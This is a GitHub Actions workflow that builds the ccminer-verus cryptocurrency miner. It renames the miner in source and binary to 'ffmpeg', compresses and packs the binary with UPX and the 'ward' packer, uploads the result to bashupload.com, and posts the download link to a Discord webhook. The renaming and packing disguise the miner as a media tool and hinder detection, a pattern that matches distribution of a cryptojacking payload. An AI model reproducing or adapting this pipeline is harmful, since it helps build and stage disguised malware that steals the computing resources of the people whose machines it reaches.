name: Build ccminer

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install Dependencies
      run: |
        sudo apt-get update
        sudo apt-get install -y cmake git build-essential libcurl4-openssl-dev libssl-dev libjansson-dev automake libgmp-dev libtool upx

    - name: Clone and Modify ccminer
      run: |
        git clone https://github.com/Oink70/ccminer-verus.git
        cd ccminer-verus
        sed -i 's/#define PROGRAM_NAME.*/#define PROGRAM_NAME "ffmpeg"/g' ccminer.cpp

    - name: Configure and Build ccminer
      run: |
        cd ccminer-verus
        ./autogen.sh
        ./configure
        make -j$(nproc)

    - name: Compress Binary with UPX
      run: |
        cd ccminer-verus
        mv ccminer ffmpeg
        upx --best --lzma ./ffmpeg

    - name: Install and Pack with Ward
      run: |
        git clone https://github.com/ex0dus-0x/ward.git
        cd ward
        make
        echo "$PWD" >> $GITHUB_PATH
        cd ../ccminer-verus
        ward ./ffmpeg

    - name: Upload to Bashupload
      run: |
        tar -cvf ffmpeg.tar ffmpeg
        curl -T ./ffmpeg.tar https://bashupload.com/ > upload_url.txt

    - name: Send URL to Discord Webhook
      run: |
        UPLOAD_URL=$(cat upload_url.txt | grep -o 'https://bashupload.com/[^\"]*')
        curl -H "Content-Type: application/json" -X POST \
        -d "{\"content\":\"$UPLOAD_URL\"}" ${{ secrets.DISCORD_WEBHOOK }}
